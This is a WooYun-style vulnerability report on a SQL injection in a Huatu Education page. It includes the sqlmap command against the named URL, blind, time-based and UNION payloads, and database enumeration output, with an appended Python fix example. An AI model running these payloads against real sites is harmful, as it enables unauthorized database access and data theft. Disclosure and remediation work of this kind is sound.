
Vulnerability summary

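Bug ID: wooyun-2015-0155995

Title: SQL injection on a Huatu Education site

Vendor: Huatu Education

Author: hecate

Submitted: 2015-11-26 10:23

Fixed: 2016-01-11 15:32

Disclosed: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]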



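Vulnerability details

Disclosure status:

2015-11-26: Details reported to the vendor; awaiting vendor response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

SQL injection on a Huatu Education site

Detailed description: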

sqlmap.py -u "http://m.v.huatu.com/netclass/freeVideo.php?action=getMore&condition=&page=1&sqlClause=-1&type1=b.id" -p "sqlClause"


Parameter: sqlClause (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=getMore&condition=&page=1&sqlClause=-1 AND 2919=2919&type1=b.id
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=getMore&condition=&page=1&sqlClause=-1 AND (SELECT * FROM (SELECT(SLEEP(5)))Jlxg)&type1=b.id
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: action=getMore&condition=&page=1&sqlClause=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b786b71,0x67654b48647644444e7742447252464e747263635155764d64434f51467a65554166626d71786b63,0x7162717671)-- -&type1=b.id
---
[09:53:40] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.2.10, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] htnews
[*] information_schema
[*] test
current user: 'htol_new@%'

Proof of vulnerability:

Database: htnews
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dede_video_click_record | 59157483
| dede_log | 1082074 |
| dede_area_articles | 759223 |
| dede_taglist_copy | 302644 |
| dede_favoritearticle | 199255 |
| dede_arctiny | 155520 |
| dede_archives | 155388 |
| dede_addonarticle | 154485 |
| dede_uploads | 39580 |
| dede_search_keywords | 35881 |
| dede_tagindex_copy | 30382 |
| vbook_saoyisao_card | 30000 |
| dede_erradd | 25709 |
| dede_archives1 | 25102 |
| vbook_card | 25000 |
| dede_calendar | 21024 |
| vbook_award_record | 5767 |
| dede_taglist | 2860 |
| lostuser | 2780 |
| dede_downloads | 2453 |
| vbook_catalog | 2399 |
| dede_mifeedback | 1555 |
| dede_feedback | 1067 |
| vbook_book | 1039 |
| dede_addonvideo | 907 |
| dede_articleclickrank | 623 |
| dede_arctype | 594 |
| dede_area | 482 |
| testaaa | 440 |
| dede_tagindex | 426 |
| vbook_activitybook | 271 |
| dede_member_space | 188 |
| dede_member_tj | 188 |
| dede_sysconfig | 185 |
| dede_co_urls | 179 |
| dede_member | 175 |
| dede_member_person | 175 |
| dede_keywords | 153 |
| dede_sgpage | 146 |
| vbook_activity | 119 |
| dede_co_htmls | 115 |
| dede_arccache | 105 |
| dede_sys_enum | 99 |
| dede_admin | 34 |
| dede_arcatt | 32 |
| dede_guestbook | 32 |
| vbook_yaoyiyao_book | 32 |
| dede_vote | 29 |
| dede_myad | 28 |
| dede_flink | 21 |
| dede_member_flink | 20 |
| vbook_category | 16 |
| dede_stepselect | 15 |
| dede_scores | 13 |
| dede_sys_module | 13 |
| vbook_saoyisao_prize | 11 |
| dede_flinktype | 8 |
| dede_plus | 8 |
| vbook_prize | 8 |
| dede_channeltype | 7 |
| dede_member_stow | 7 |
| dede_arcrank | 5 |
| dede_co_note | 5 |
| dede_shops_paytype | 5 |
| vbook_saoyisao_book | 5 |
| dede_admintype | 4 |
| dede_co_mediaurls | 4 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| dede_co_onepage | 3 |
| dede_moneycard_type | 3 |
| dede_addonspec | 2 |
| dede_member_model | 2 |
| dede_member_stowtype | 2 |
| dede_multiserv_config | 2 |
| dede_mytag | 2 |
| dede_sys_set | 2 |
| dede_arcmulti | 1 |
| dede_freelist | 1 |
| dede_homepageset | 1 |
| dede_member_group | 1 |
| dede_softconfig | 1 |
| dede_story_catalog | 1 |
| Temp_udf | 1 |
+-------------------------+---------+

Suggested fix:

Filter the input

Copyright notice: please credit the source hecate@乌云 when reposting
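
One way to apply that filtering to the `sqlClause`, `page` and `type1` parameters seen in the request above, as an added example that is not the vendor's code. The query shape, the `videos` table, its columns and the allowlist entries are assumptions, since the report does not show the server-side query; SQLite stands in for MySQL so the block runs offline.

```python
import re
import sqlite3

PAGE_SIZE = 2
# Assumption: request value -> real column; nothing outside this map reaches SQL.
ALLOWED_COLUMNS = {"b.id": "b.id", "b.type_id": "b.type_id"}
INT_RE = re.compile(r"-?[0-9]{1,9}")  # ASCII digits only, bounded length


class BadRequest(ValueError):
    """Raised when a parameter is not in its expected form."""


def parse_int(params, name):
    raw = params.get(name, "")
    if not INT_RE.fullmatch(raw):
        raise BadRequest(name)
    return int(raw)


def fetch_more(db, params):
    clause = parse_int(params, "sqlClause")
    page = parse_int(params, "page")
    column = ALLOWED_COLUMNS.get(params.get("type1", ""))
    if column is None or page < 1:
        raise BadRequest("type1/page")
    # Only the allowlisted identifier is interpolated; every value is bound.
    sql = (f"SELECT b.id, b.title FROM videos AS b WHERE {column} > ? "
           "ORDER BY b.id LIMIT ? OFFSET ?")
    return db.execute(sql, (clause, PAGE_SIZE, (page - 1) * PAGE_SIZE)).fetchall()


def make_db():
    """Constructed in-memory sample data (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE videos (id INTEGER PRIMARY KEY, type_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO videos VALUES (?, ?, ?)",
                   [(1, 10, "intro"), (2, 10, "lesson"), (3, 20, "review")])
    return db


def is_rejected(db, params):
    try:
        fetch_more(db, params)
        return False
    except BadRequest:
        return True
```

The identifier in `type1` cannot be bound as a query parameter, which is why it goes through an allowlist while the numeric values are validated and bound.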


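Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-11-27 08:45

Vendor reply:

Thank you for your attention to Huatu Education; this has been fixed.

Latest status:

None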